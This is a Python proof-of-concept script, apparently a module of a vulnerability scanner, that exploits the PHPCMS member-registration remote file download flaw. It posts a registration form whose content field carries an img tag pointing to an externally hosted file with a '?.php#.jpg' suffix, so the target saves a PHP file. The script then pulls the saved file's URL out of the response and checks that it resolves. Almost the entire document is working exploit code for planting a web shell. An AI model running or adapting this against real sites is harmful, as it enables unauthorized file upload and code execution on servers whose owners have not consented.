#!/usr/bin/env python
#-*- coding: utf-8 -*-

import requests
import sys
import random
import re
import argparse
from json_parse import Jsonparse

headers = {
	"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0",
	"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
	"Content-Type": "application/x-www-form-urlencoded",
	"Accept-Encoding": "gzip, deflate",
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
}


class phpcms(object):
	def __init__(self,ip,port,level):
		self.ip = ip
		self.port = port
		self.level = level

	def run(self):
		global req
		string=''
		name = string.join(random.sample(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 10)).replace(" ", "")
		data = {
			'siteid': '1',
			'modelid': '1',
			'username': name,
			'password': name+'1',
			'email': name+'@test.com',
			'info[content]': '<img src=http://gitee.com/dylk/tmpp/raw/master/ceshi.txt?.php#.jpg>',#更改成公网ip并创建一个文件进行上传验证。
			'dosubmit': '1',
		}
		
		url = 'http://'+self.ip+':'+str(self.port)+'/index.php?m=member&c=index&a=register&siteid=1'
		try:
			req = requests.post(url=url, data=data, timeout = self.level)
		except Exception as e:
				print(e)
				exit(-1)
				
		shell = ''
		re_result = re.findall(r'&lt;img src=(.*)&gt', req.content)
		print(re_result)
		if len(re_result):
			shell = re_result[0]
			print (shell)
		if self.ip in shell:
			r2 = requests.get(shell,timeout = self.level)
			if r2.status_code == 200:
				print("success")
				exit(233) 	
		else:
			print("no vul in phpcms")
			exit(1)
if __name__ == '__main__':
	jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
	jsonobj = Jsonparse(jsonfile)
	jsondata = jsonobj.parse()
	targetip = sys.argv[2]
	timeout = jsondata['timeout2']
	port = sys.argv[3]
	obj = phpcms(targetip, port, timeout)
	obj.run()